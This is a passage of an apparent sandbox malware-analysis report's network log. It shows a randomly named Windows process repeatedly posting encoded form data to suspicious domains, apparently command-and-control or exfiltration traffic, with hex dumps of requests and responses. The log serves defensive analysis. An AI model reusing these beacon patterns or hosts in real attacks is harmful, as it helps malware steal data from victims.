                                                            Data Ascii: 8fDj1xdevNnbU3VFfTEL/W33pfH31cGYBpgW9Lba3Ic8C8iA77NLe514vu8BPj6/n3lCd/VkgKXGkwYUQHAaM+yQunBmNSwbRVYh+kOcgMhvRDB1Md20YfiR+UFfvdIizp2v1vVjt0usa1pmNzAX2IFl5/xaE9aqQGSD6bxI0RZSw3uuF0YjQHepjMxHmd9IgC1NbY1VSkdeB4vXMH0KSQVIvQfERciMpcaFtW4H8iI0gB2MzfE
                                                            Jan 11, 2025 04:17:08.516148090 CET | 1236 | IN | Data Raw: 49 39 6b 36 6e 75 4c 45 38 62 7a 4b 56 53 45 43 45 48 65 43 5a 53 79 73 72 30 34 71 4a 47 6e 54 7a 73 56 78 4a 6f 51 77 6d 37 62 50 68 51 37 63 7a 61 35 45 43 47 51 47 70 67 36 54 6e 6a 7a 6d 57 42 62 55 37 74 45 78 6b 68 56 77 33 36 79 7a 33 48
                                                            Data Ascii: I9k6nuLE8bzKVSECEHeCZSysr04qJGnTzsVxJoQwm7bPhQ7cza5ECGQGpg6TnjzmWBbU7tExkhVw36yz3HCm0qEvEZ9C7vDYZeWAQhnKkQUG/i7NDnCL/hwbvJr6miPKHTaOE54xpBGrl8RIXKX1bk3+A1aUhHxUte3sHEvNSIp4REdBNONA9NOWYEwuq54AhPex3NaIQLwHIIQlQkPbwsRFpdmdb/hD8TSDCwTBu8W30sSIiS7
                                                            Jan 11, 2025 04:17:08.516182899 CET | 1116 | IN | Data Raw: 42 64 52 43 4d 4d 56 36 4f 6e 48 72 74 57 33 62 78 63 38 56 4a 56 6d 50 51 2b 49 46 51 6d 62 74 79 55 67 65 6a 65 6d 36 56 73 7a 77 61 4e 4a 35 49 51 54 39 72 38 41 55 46 30 34 2f 44 6f 4d 49 2b 4e 68 31 5a 57 35 4d 34 63 68 4a 35 79 75 4e 52 4d
                                                            Data Ascii: BdRCMMV6OnHrtW3bxc8VJVmPQ+IFQmbtyUgejem6VszwaNJ5IQT9r8AUF04/DoMI+Nh1ZW5M4chJ5yuNRMAnv7Th0PwP74pTl9UjPZ8Gj19PYSn0S1FQG2VfGvSPqxrp52mBN6I25n2CTBOORE0/6GiVn9YNf8bFBd4RURFlWzBvyBEqIi4I9aky+2r29597/ZD62+xKVfBtNM6qaHRG61erXPBOfO6HN7UYlJmuslpWDUTdYab
                                                            Jan 11, 2025 04:17:08.516216993 CET | 1236 | IN | Data Raw: 57 6b 41 62 38 31 6b 7a 38 66 45 6f 35 4e 61 30 72 41 51 59 55 38 4b 51 45 57 45 50 53 6b 41 61 61 66 6e 52 50 69 58 45 47 48 50 43 43 62 63 6e 78 70 68 49 45 50 50 6e 68 58 63 39 58 6b 52 4e 75 48 68 33 43 77 38 4a 58 74 65 65 43 56 37 5a 6a 67
                                                            Data Ascii: WkAb81kz8fEo5Na0rAQYU8KQEWEPSkAaafnRPiXEGHPCCbcnxphIEPPnhXc9XkRNuHh3Cw8JXteeCV7Zjg/wua8YGl3XvDUPy/c/Avd4/hNDSqegQAAAABJRU5ErkJggg==); } .container { width: 70%; } .status-code {
                                                            Jan 11, 2025 04:17:08.516257048 CET | 792 | IN | Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 67 2d 73 79 73 2f 73 65 72 76 65 72 5f 6d 69 73 63 6f 6e 66 69 67 75 72 65 64 2e 70 6e 67 22 20 63 6c 61 73 73 3d 22 69 6e 66 6f
                                                            Data Ascii: <img src="/img-sys/server_misconfigured.png" class="info-image" /> <div class="info-heading"> www.nieuws-july202488.sbs/cp_errordocument.shtml (port 80)
                                                            Jan 11, 2025 04:17:08.516293049 CET | 135 | IN | Data Raw: 3d 22 63 6f 70 79 72 69 67 68 74 22 3e 43 6f 70 79 72 69 67 68 74 20 c2 a9 20 32 30 31 36 20 63 50 61 6e 65 6c 2c 20 49 6e 63 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20
                                                            Data Ascii: ="copyright">Copyright 2016 cPanel, Inc.</div> </a> </div> </footer> </body></html>0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            5 | 192.168.2.7 | 49982 | 104.18.73.116 | 80 | 6896 | C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jan 11, 2025 04:17:13.583718061 CET | 811 | OUT | POST /s15n/ HTTP/1.1
                                                            Host: www.losmason.shop
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-us
                                                            Accept-Encoding: gzip, deflate
                                                            Connection: close
                                                            Content-Length: 220
                                                            Cache-Control: max-age=0
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Origin: http://www.losmason.shop
                                                            Referer: http://www.losmason.shop/s15n/
                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                            Data Raw: 4d 48 4a 30 47 58 69 3d 45 64 34 70 70 51 73 4d 6e 35 54 79 2b 42 36 6f 4a 68 77 38 38 37 47 6c 66 2b 48 4c 2b 4c 6f 73 37 75 4c 7a 79 33 36 54 56 39 47 31 5a 77 58 42 4c 37 47 2b 57 65 6c 77 6f 46 30 43 4f 52 6d 62 33 31 62 42 31 78 44 6a 55 78 55 48 75 4d 4f 47 6f 53 38 6e 33 41 64 44 75 4e 35 45 56 49 2f 62 47 5a 6c 58 32 6f 73 49 33 43 55 37 43 5a 76 38 74 38 34 33 59 65 62 4c 30 79 67 75 52 67 6d 32 4c 52 47 70 49 6f 65 42 4e 6c 6f 78 67 31 68 54 4c 64 6e 77 4c 58 68 4a 62 76 77 6c 2b 68 55 53 47 6d 42 6f 37 39 4e 71 46 4e 70 78 65 69 31 67 71 65 48 38 2b 52 46 6a 5a 7a 45 59 79 32 39 5a 55 36 39 63 66 6f 61 79 6e 6f 57 74 42 71 52 62 4c 77 3d 3d
                                                            Data Ascii: MHJ0GXi=Ed4ppQsMn5Ty+B6oJhw887Glf+HL+Los7uLzy36TV9G1ZwXBL7G+WelwoF0CORmb31bB1xDjUxUHuMOGoS8n3AdDuN5EVI/bGZlX2osI3CU7CZv8t843YebL0yguRgm2LRGpIoeBNloxg1hTLdnwLXhJbvwl+hUSGmBo79NqFNpxei1gqeH8+RFjZzEYy29ZU69cfoaynoWtBqRbLw==
                                                            Jan 11, 2025 04:17:14.012012005 CET | 1236 | IN | HTTP/1.1 409 Conflict
                                                            Date: Sat, 11 Jan 2025 03:17:13 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 6119
                                                            Connection: close
                                                            X-Frame-Options: SAMEORIGIN
                                                            Referrer-Policy: same-origin
                                                            Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                            Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                            Vary: Accept-Encoding
                                                            Server: cloudflare
                                                            CF-RAY: 9001c0aa3b5a42be-EWR
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 44 4e 53 20 72 65 73 6f 6c [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>DNS resolution error | www.losmason.shop | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/main.css" /><script>(function(){if(document.addEventListener&&window.XMLHttpRequest&&JSON&&


                                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                            6           192.168.2.7  49983        104.18.73.116   80                6896  C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe
                                                            Timestamp                            Bytes transferred  Direction  Data
                                                            Jan 11, 2025 04:17:16.132200003 CET  831                OUT        POST /s15n/ HTTP/1.1
                                                            Host: www.losmason.shop
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-us
                                                            Accept-Encoding: gzip, deflate
                                                            Connection: close
                                                            Content-Length: 240
                                                            Cache-Control: max-age=0
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Origin: http://www.losmason.shop
                                                            Referer: http://www.losmason.shop/s15n/
                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                            Data Ascii: MHJ0GXi=Ed4ppQsMn5Ty/hqoaQw8tLGkCOHLnboo7uPzy2/WWPS1ASPBI/y+Y+lw8V09KRmA31Xj1w/jUxQHuJyGohEg2QdNht5Gao/bGZlX2o4i3CM7CqH8sd40bebEzygubAmyLRGbIpy7Nj0xgwlTLITzCXhTDPxy/xxhCyFhh+9+c9BpW00Cw8LQgA9YdxgulQgsW75ESKuT4fzHM4wfdOT912IBhnccf1XQKLWEDYw=
                                                            Jan 11, 2025 04:17:16.576186895 CET  1236               IN         HTTP/1.1 409 Conflict
                                                            Date: Sat, 11 Jan 2025 03:17:16 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 6119
                                                            Connection: close
                                                            X-Frame-Options: SAMEORIGIN
                                                            Referrer-Policy: same-origin
                                                            Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                            Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                            Vary: Accept-Encoding
                                                            Server: cloudflare
                                                            CF-RAY: 9001c0ba4b7543df-EWR
                                                            Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>DNS resolution error | www.losmason.shop | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/main.css" /><script>(function(){if(document.addEventListener&&window.XMLHttpRequest&&JSON&&


                                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                            7           192.168.2.7  49984        104.18.73.116   80                6896  C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe
                                                            Timestamp                            Bytes transferred  Direction  Data
                                                            Jan 11, 2025 04:17:18.677880049 CET  1844               OUT        POST /s15n/ HTTP/1.1
                                                            Host: www.losmason.shop
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-us
                                                            Accept-Encoding: gzip, deflate
                                                            Connection: close
                                                            Content-Length: 1252
                                                            Cache-Control: max-age=0
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Origin: http://www.losmason.shop
                                                            Referer: http://www.losmason.shop/s15n/
                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                            Data Ascii: MHJ0GXi= [TRUNCATED]
                                                            Jan 11, 2025 04:17:19.121052980 CET  1236               IN         HTTP/1.1 409 Conflict
                                                            Date: Sat, 11 Jan 2025 03:17:19 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 6119
                                                            Connection: close
                                                            X-Frame-Options: SAMEORIGIN
                                                            Referrer-Policy: same-origin
                                                            Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                            Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                            Vary: Accept-Encoding
                                                            Server: cloudflare
                                                            CF-RAY: 9001c0ca2bb64246-EWR
                                                            Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>DNS resolution error | www.losmason.shop | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/main.css" /><script>(function(){if(document.addEventListener&&window.XMLHttpRequest&&JSON&&


                                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                            8           192.168.2.7  49985        104.18.73.116   80                6896  C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe
                                                            Timestamp                            Bytes transferred  Direction  Data
                                                            Jan 11, 2025 04:17:21.220016003 CET  553                OUT        GET /s15n/?nHI4y=ULkH023p-2&MHJ0GXi=JfQJqlQL4YuujxfZFicS9Y3zSvzh5uc29LPY+3nQdNuELRDWQb2uefNArAI9Jzm+wUv6iBr2b0gwhreB6wQHyT0LsuYRSsPCWoh575Uq8xJMJajdjvw7bNvPz2QoSF69NC7qAb+tKFkF HTTP/1.1
                                                            Host: www.losmason.shop
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-us
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                            Jan 11, 2025 04:17:21.661411047 CET  406                IN         HTTP/1.1 409 Conflict
                                                            Date: Sat, 11 Jan 2025 03:17:21 GMT
                                                            Content-Type: text/plain; charset=UTF-8
                                                            Content-Length: 16
                                                            Connection: close
                                                            X-Frame-Options: SAMEORIGIN
                                                            Referrer-Policy: same-origin
                                                            Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                            Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                            Server: cloudflare
                                                            CF-RAY: 9001c0da0e531902-EWR
                                                            Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 30 31
                                                            Data Ascii: error code: 1001


                                                            Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                                            9           192.168.2.7  49986        192.185.147.100  80                6896  C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe
                                                            Timestamp                            Bytes transferred  Direction  Data
                                                            Jan 11, 2025 04:17:27.017071962 CET  808                OUT        POST /yf1h/ HTTP/1.1
                                                            Host: www.hayaniya.org
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-us
                                                            Accept-Encoding: gzip, deflate
                                                            Connection: close
                                                            Content-Length: 220
                                                            Cache-Control: max-age=0
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Origin: http://www.hayaniya.org
                                                            Referer: http://www.hayaniya.org/yf1h/
                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                            Data Ascii: MHJ0GXi=VXBo7Mv86w/xrhgoX6qWDSahjL4viAZWsc+HH4Aksk6Ufyg3La0IA1ImSTVjNN+1MuLimSDdweikgC+7Sa/asNqMKDGGNDvYFoDlCpOaz/Xkn0+8bMYz3FvgnrF3CY6UJVtN0w/2jUOzmusNzv40TxFEcyve1ZnevILZvuGAbRW1YCREwh+IFy1Vgv7ryJvruJ/dOs1AJFQGsKMVfA==
                                                            Jan 11, 2025 04:17:28.228260040 CET  1236               IN         HTTP/1.1 404 Not Found
                                                            Date: Sat, 11 Jan 2025 03:17:27 GMT
                                                            Server: Apache
                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                            Link: <https://hayaniya.org/wp-json/>; rel="https://api.w.org/"
                                                            Upgrade: h2,h2c
                                                            Connection: Upgrade, close
                                                            Vary: Accept-Encoding
                                                            Content-Encoding: gzip
                                                            Transfer-Encoding: chunked
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 31 66 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 e4 b2 eb 92 dc c6 95 2e fa 9b fd 14 10 14 24 bb ed ce 42 dd 2f cd aa f6 9e b1 e5 73 bc c3 de 72 58 9a f0 9e 90 74 7a 27 80 04 90 ea 44 26 94 48 74 75 89 d3 3f 24 91 34 87 6f 31 e1 b0 5b e4 11 ad e1 a6 ad 08 9e 27 41 bd cd 59 40 02 55 a8 2a 54 5f c8 6e 1d 8f 0f a5 46 ad 5c f7 ef 5b df f8 bd 5f 7c f8 f3 8f ff f5 b7 1f 18 81 0a d9 e1 ce 38 fb 31 5c 2a 27 a6 54 cc 34 18 e6 fe c4 c4 d2 cc 42 04 bb 87 3b 77 c6 21 51 d8 70 02 2c 63 a2 26 e6 bf 7c fc 4b 34 34 0d 6b 11 e1 38 24 13 f3 84 92 69 24 a4 32 0d 47 70 45 38 64 4e a9 ab 82 89 4b 4e a8 43 50 fe d8 37 28 a7 8a 62 86 62 07 33 32 69 15 7d 18 e5 c7 86 24 6c 62 46 52 78 94 11 d3 08 24 f1 26 66 a0 54 74 60 59 7e 18 f9 0d 21 7d eb d4 e3 56 ab a6 8a 72 df c6 ce f1 5a 59 80 67 98 d3 19 d6 a5 21 93 91 d3 88 82 a8 28 57 54 31 72 98 9e cf 1f a5 7f 9b 7f 95 be 4c 9f 1b e9 ff 33 7f 96 be 32 e6 8f e7 4f d3 ef e0 ef fb f4 79 c3 b8 f7 fe b0 dd 6a 3d 30 f2 cc ef e6 8f d3 37 90 f4 5c 3f 5f a4 6f e0 f7 e9 fc c9 d2 75 9e be [TRUNCATED]
                                                            Data Ascii: 1faa.$B/srXtz'D&Htu?$4o1['AY@U*T_nF\[_|81\*'T4B;w!Qp,c&|K44k8$i$2GpE8dNKNCP7(bb32i}$lbFRx$&fTt`Y~!}VrZYg!(WT1rL32Oyj=07\?_ouN_Yo<:sl;Ka_w?'($azX~/IK0=vg=aS(W:(K;0:f3:5ZllU<rU"cTDQ+*%peTL(No:uyxw`kp#TW:RihP|N?"JQxh8&"yPVSh.V^5}:hj&9UP~PwtCHC&nU>a<y@)o|I1h;O3>hlx~q'FO;v>{x!}.{,8"!$VW4.'SxqYB>v$GJH+@+GF$\z
                                                            Jan 11, 2025 04:17:28.228353024 CET1236INData Raw: b3 5d b5 b7 77 06 44 38 41 36 ee ec 6c 31 3e da 85 19 d9 6a a4 e1 00 54 f9 3b e2 a8 dd e6 7e 73 1f de 98 9f 60 b8 03 75 55 b0 7c 06 84 fa 81 da 03 07 a0 66 1f c3 1d 77 15 a4 37 f7 1e 68 00 d9 96 ff 42 b9 ea b4 ff 49 4a 3c db 25 0d 1f 76 ca 8e 08
                                                            Data Ascii: ]wD8A6l1>jT;~s`uU|fw7hBIJ<%vn/'wmH @"H&D}v$8)4P1Ea4q4H4i7.|x=4{%mg[mzbwnRIwM:AnW^&5$J
                                                            Jan 11, 2025 04:17:28.228367090 CET1236INData Raw: 33 cc e9 0c a4 2e 7d 6b 1a 21 00 a2 60 b6 15 b1 c4 a7 3c b6 02 60 82 48 e4 09 01 3a 47 84 91 6c 33 21 2d ca 1d ab ec 0d 5d 2d 4f e6 85 6e 03 1e 3f 03 32 27 ad 46 bf d1 6d dd 37 42 e2 52 3c b9 0f 5c de 37 2c 58 37 5f 24 5f 0f a6 e5 b0 f4 6e 31 a2
                                                            Data Ascii: 3.}k!`<`H:Gl3!-]-On?2'Fm7BR<\7,X7_$_n1wvPRFfF;w4x!1W jK\NQ`6hp-`UPl4aBQ3!5=2R$*f2d]( f9F]Apa$Zg
                                                            Jan 11, 2025 04:17:28.228388071 CET1236INData Raw: 7f 23 f8 83 43 e2 dd e6 be 51 fc df 68 af 5f b1 ac 76 09 89 00 09 f0 a9 3f bd 66 4d 75 77 5b 35 fc ca 68 39 b9 ae 76 eb 64 91 a8 4c 95 ee 6a 39 ea 94 3d da bd de be b1 fc b4 f6 f6 17 89 ab 33 5a db 26 38 92 c6 17 6e 07 95 67 07 d3 80 48 b2 db a0
                                                            Data Ascii: #CQh_v?fMuw[5h9vdLj9=3Z&8ngH1kK!>2_Rw5X}`dg2}`F}"a|`8+"7C?7\z0 qAZi97+!61rKBtAIH~YYFw^R8rwU
                                                            Jan 11, 2025 04:17:28.228399992 CET | 1236 | IN | Data Raw: 6d 16 1b b5 06 ed de 68 34 1c f6 bb 6f b9 95 14 ef 42 5f 56 7f 55 f5 75 1a 9d b7 db d1 67 c2 c6 ec 9d 99 d3 6d 36 99 bb 9e e6 56 ef 39 6c de cc 41 87 cd ea 5e c3 41 ab d7 ed b4 df 61 2f 68 72 33 8b 41 a3 f5 cd 5a ad d1 75 36 0b 08 63 02 2d f7 bb
                                                            Data Ascii: mh4oB_VUugm6V9lA^Aa/hr3AZu6c-Z*Zk`je|}}D"OEnv/y00Fb-5thpDg)MXbzOfn3={:O7t+^U<xgPs31{7;.#g
                                                            Jan 11, 2025 04:17:28.228411913 CET | 1236 | IN | Data Raw: d7 85 bf 1e fc f5 4b 3e 97 ba 3d 30 1c 4c a5 c8 a7 d8 c2 9d 5d 9c b1 d3 c8 09 e1 2a 46 58 12 6c 60 60 29 3b 1c 80 e7 0a dc 97 2e a7 09 01 8e 9a 6e 93 e4 1d ef dc 19 5b b1 9a 31 72 98 9b 01 c1 ee e1 ce ce 38 df c5 61 38 8e 27 66 a6 15 22 a5 90 dd
                                                            Data Ascii: K>=0L]*FXl``);.n[1r8a8'f"fFIb%B/x(!27= 0#0c-8 DmKp^zKONYxFLMXXeOp;""saje@(>HB;b~3{ERD$
                                                            Jan 11, 2025 04:17:28.228425026 CET | 776 | IN | Data Raw: 53 fd bb bf 51 d1 6d 56 7c 71 e1 fc e4 b3 b3 8a f7 48 df ea b6 46 e4 04 be 13 86 56 ff 72 0c 0a db 8c a8 b7 1e a1 7f 36 a2 17 a0 f9 ff 60 e2 3b de e9 ca 13 b5 76 8f 40 95 2a f8 71 a7 fd 68 a4 ae 0c fd b1 78 75 98 88 c9 d1 e2 9e ef 38 b0 dd bc fe
                                                            Data Ascii: SQmV|qHFVr6`;v@*qhxu8NiXa:RL#(&X:oS7v00,Z ]a,=!2}5JEmH`vs:!}4BNLs*GGIMi\b(eD;$%rb/
                                                            Jan 11, 2025 04:17:28.228437901 CET | 1236 | IN | Data Raw: 4a 44 9b 59 85 b5 e9 41 5e c7 1b f4 bc aa 64 03 ea ba c0 45 28 6c ca 40 aa 2e 56 18 51 17 60 eb cc c2 53 e4 1f a9 59 44 26 a6 1e 58 84 62 a2 14 e5 3e ec fd f0 de 17 89 50 0f 6c ec 1c fb 52 24 dc 3d 5a 9a 3a 74 a0 7f 72 9c d4 d1 8f 33 7d ad 7a 02
                                                            Data Ascii: JDYA^dE(l@.VQ`SYD&Xb>PlR$=Z:tr3}zQHDv=AI737p ;QJqEZtM"4\)"Q|}n3c-(dW184@obJEex9u(wG_'Y[
                                                            Jan 11, 2025 04:17:28.228610992 CET | 1236 | IN | Data Raw: c2 df b3 db a4 af db b9 82 fe aa a0 17 9a f2 96 40 ed 1a 12 b5 0a fb f9 b7 55 49 6d 6a fb 12 66 00 3f 90 f1 3d 60 7f a5 c9 78 31 7f 32 ff 0a 9e ff 39 7f b6 24 63 6c 25 2c fb e6 f6 15 78 71 92 58 89 70 93 94 0d 7f 80 63 e4 04 94 b9 92 f0 8a bb 3b
                                                            Data Ascii: @UImjf?=`x129$cl%,xqXpc;VzB>u0w!5%tgG>T$w!Jb@^[~u7eYdv)<s-?|)&e~J;$JbVhl=&c"[=`%Tu`/_W
                                                            Jan 11, 2025 04:17:28.228625059 CET | 1236 | IN | Data Raw: b9 e7 bb f9 a3 f4 f5 ad 91 d3 ed 77 af c4 4d 0d ba 4d 49 e8 24 af f4 2f 98 bb a6 24 34 e4 1c 7f fa a7 f4 fb f4 1c 28 79 7e 8b 0c 0c ae c4 40 bb 02 a8 00 a7 19 d0 8a e8 56 24 84 35 27 e8 c7 66 ee 6b 20 0a c8 32 d2 17 e9 5f 41 4f cf e6 8f 8c 1f 9b
                                                            Data Ascii: wMMI$/$4(y~@V$5'fk 2_AOvo0N@Qo6q<f"fM7gs|3<nnRmPJjSj&^ij^-[}$V"h9e$O]}"
                                                            Jan 11, 2025 04:17:28.233323097 CET | 691 | IN | Data Raw: b2 83 12 be cf 48 6d c8 4e a4 bf 52 a5 91 6e 38 16 25 15 4a 8b a5 6b 29 d5 55 db d4 eb 25 8c 1d 41 8a 0a 56 85 ab 91 ae c8 95 e1 99 48 d4 4a 9a 2b 45 e4 8a 29 5f c9 8b 13 3b a7 84 82 20 8b ec 62 d8 09 66 09 59 69 70 8f a9 07 b4 38 cf a7 c5 46 38
                                                            Data Ascii: HmNRn8%Jk)U%AVHJ+E)_; bfYip8F86<yO-+Q[b9[i=b_gE>J&H+x7\B[+L9LCD)MCarNi`I1b&lbj<@N# cu]'bF$I`EImu!n6d


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            10 | 192.168.2.7 | 49987 | 192.185.147.100 | 80 | 6896 | C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Jan 11, 2025 04:17:29.577096939 CET | 828 | OUT | POST /yf1h/ HTTP/1.1
                                                            Host: www.hayaniya.org
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-us
                                                            Accept-Encoding: gzip, deflate
                                                            Connection: close
                                                            Content-Length: 240
                                                            Cache-Control: max-age=0
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Origin: http://www.hayaniya.org
                                                            Referer: http://www.hayaniya.org/yf1h/
                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
